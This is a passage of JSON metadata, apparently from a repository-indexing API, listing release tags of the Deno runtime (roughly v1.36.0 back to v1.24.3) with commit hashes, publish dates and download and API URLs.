1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a2763289